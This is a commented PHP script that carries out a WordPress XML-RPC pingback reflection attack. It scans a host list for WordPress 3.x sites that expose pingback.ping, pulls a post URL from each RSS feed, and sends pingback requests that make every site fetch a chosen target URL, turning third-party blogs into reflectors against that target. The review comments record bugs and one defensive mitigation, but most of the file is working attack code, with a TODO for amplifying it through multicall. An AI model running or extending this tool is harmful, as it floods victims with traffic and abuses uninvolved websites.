<?php
// WordPress XML-RPC pingback reflection tool (CLI). Pipeline, in file order:
// filter $hosts down to sites that look like WordPress 3.x and whose xmlrpc.php
// advertises pingback.ping, pick a post URL on each from its RSS feed, then send
// each site a pingback.ping that claims $target links to that post. WordPress
// verifies such a claim by fetching the source URL itself, so each reflector
// ends up issuing a request to $target on the caller's behalf.
// This is offensive tooling: every request below goes to third-party servers,
// so run it only against infrastructure you are authorised to test.
// Defensive note: a site can drop pingback.ping from its XML-RPC method table
// (e.g. via the WordPress 'xmlrpc_methods' filter) or block xmlrpc.php at the
// edge; neither is detectable from this file alone, so confirm on the target.
if ($argc <= 1) {
    echo "Run as the following:\n";
    echo "php " . $argv[0] . " targeturl.com\n";
    exit(1);
}
// :^)
// $hosts is empty in this listing, so the pipeline at the bottom of the file is
// a no-op until the list is populated.
$hosts = [];
// NOTE(review): the usage text places the target first ($argv[1]) and the guard
// above only requires one argument, yet the target is read from $argv[2]; with
// a single argument this is an undefined index and $target is null.
$target = $argv[2];
/**
 * Probe an xmlrpc.php endpoint with system.listMethods and report whether the
 * reply mentions pingback.ping. Any transport failure (curl_exec() returning
 * false) simply yields false. Only a connect timeout is configured, so a host
 * that accepts the connection but never answers can stall the caller; the XML
 * also starts with a newline ahead of the declaration, which strict parsers
 * may reject -- presumably tolerated by the intended endpoint, verify.
 */
function has_pingback($url)
{
    // TODO: Create a scanner that will check for valid wordpress sites
    $listMethods = '
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
';
    $handle = curl_init();
    curl_setopt_array($handle, [
        CURLOPT_URL => $url,
        CURLOPT_POSTFIELDS => $listMethods,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_CONNECTTIMEOUT => 10,
    ]);
    $reply = curl_exec($handle);
    curl_close($handle);
    // A false reply is coerced to an empty haystack, so the probe reads as "no".
    $hit = strpos($reply, 'pingback.ping');
    return $hit !== false;
}
/**
 * Heuristic WordPress 3.x check: fetch $url and look for the literal string
 * 'WordPress 3' anywhere in the body (typically the generator meta tag).
 * Returns false on any transport failure. Only a connect timeout is set, so a
 * slow server can hold the caller indefinitely; redirects are not followed.
 */
function is_valid_wordpress($url)
{
    // TODO: Create a scanner that will check for valid wordpress sites
    $handle = curl_init();
    curl_setopt_array($handle, [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_CONNECTTIMEOUT => 10,
    ]);
    $body = curl_exec($handle);
    curl_close($handle);
    // curl_exec() returns false on failure; strpos() then sees an empty haystack.
    $marker = strpos($body, 'WordPress 3');
    return $marker !== false;
}
// Send a single pingback.ping to $host (an xmlrpc.php URL) asserting that
// $target (sourceURI) links to $blog_url (targetURI, a post on the reflector).
// WordPress verifies that assertion by fetching the source URL itself, which is
// the reflected request; the reflector's reply body is discarded here.
// Caveats a reader should know:
//  - $target and $blog_url are spliced into the XML without escaping, so an
//    '&' or '<' in either one yields a malformed payload.
//  - the payload begins with a newline before the XML declaration (strictly
//    malformed; presumably tolerated by the intended endpoint -- verify).
//  - only CURLOPT_CONNECTTIMEOUT is set; a reflector that accepts the
//    connection and then stalls blocks the whole sequential loop.
//  - curl_errno() reports transport errors only, so "sent request" is printed
//    even when the reflector answered with an XML-RPC fault and did nothing.
function pingback($host, $blog_url, $target)
{
    // TODO: utilize multisys method to achieve more pingback requests with one HTTP request to xmlrpc.php
    $payload = '
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>' . $target . '</string></value>
</param>
<param>
<value><string>' . $blog_url . '</string></value>
</param>
</params>
</methodCall>
';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $host);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_exec($ch);
    // Transport-level success only; an XML-RPC fault still lands here.
    if (!curl_errno($ch)) {
        echo "-> sent request to " . $target . " using reflector " . $host . "\n";
    }
    curl_close($ch);
}
/**
 * Fetch the site's RSS2 feed ($url . '/?feed=rss2', redirects followed) and
 * return the <link> of the first <item>, or NULL when the feed cannot be
 * fetched or contains no matching item. Unlike get_xmlrpc_url(), no trailing
 * slash handling is done, so a $url ending in '/' produces '//?feed=rss2'.
 * No timeout of any kind is configured for this request.
 */
function get_blog_url($url)
{
    $feed = $url . '/?feed=rss2';
    $handle = curl_init();
    curl_setopt_array($handle, [
        CURLOPT_URL => $feed,
        CURLOPT_FOLLOWLOCATION => 1,
        CURLOPT_RETURNTRANSFER => 1,
    ]);
    $xml = curl_exec($handle);
    curl_close($handle);
    // preg_match() returns 1 on a hit (group 1 always participates), 0 on no
    // match and false on a PCRE error; only the hit yields a link.
    $found = preg_match("/<item>.+?<link>(.+?)<\/link>.+?<\/item>/s", $xml, $m);
    if ($found !== 1) {
        return NULL;
    }
    return $m[1];
}
/**
 * Append xmlrpc.php to a site URL, inserting the separating slash only when
 * $url does not already end with one. No other normalisation (scheme, query
 * string, duplicate slashes) is attempted.
 */
function get_xmlrpc_url($url)
{
    $endsWithSlash = substr($url, -1) == '/';
    $suffix = $endsWithSlash ? 'xmlrpc.php' : '/xmlrpc.php';
    return $url . $suffix;
}
// Stage 1: keep only entries that are strings, parse as a URL (FILTER_VALIDATE_URL
// accepts any scheme, not just http/https), look like WordPress 3.x, and whose
// xmlrpc.php lists pingback.ping. Every check is a blocking HTTP round trip and
// the hosts are processed one after another. array_filter() preserves keys.
$vulnerable_hosts = array_filter($hosts, function ($host) {
    return (is_string($host)
        && filter_var($host, FILTER_VALIDATE_URL)
        && is_valid_wordpress($host)
        && has_pingback(
            get_xmlrpc_url($host)
        ));
});
// Stage 2: build host => first post URL from each site's RSS feed; hosts
// without a usable link are dropped. The loose == NULL comparison also drops
// an empty-string link.
$active_reflectors = array_reduce($vulnerable_hosts, function ($acc, $host) {
    $pingback_blog_url = get_blog_url($host);
    if ($pingback_blog_url == NULL) {
        return $acc;
    }
    $acc[$host] = $pingback_blog_url;
    return $acc;
}, []);
// Stage 3: one pingback.ping per reflector, sequentially. array_walk() takes
// its array by reference, so handing it the array_keys() temporary may raise an
// "Only variables should be passed by reference" notice; the closure reaches
// script-level state through global rather than a use() capture.
array_walk(array_keys($active_reflectors), function ($host) {
    global $active_reflectors, $target;
    pingback(
        get_xmlrpc_url($host),
        $active_reflectors[$host],
        $target
    );
});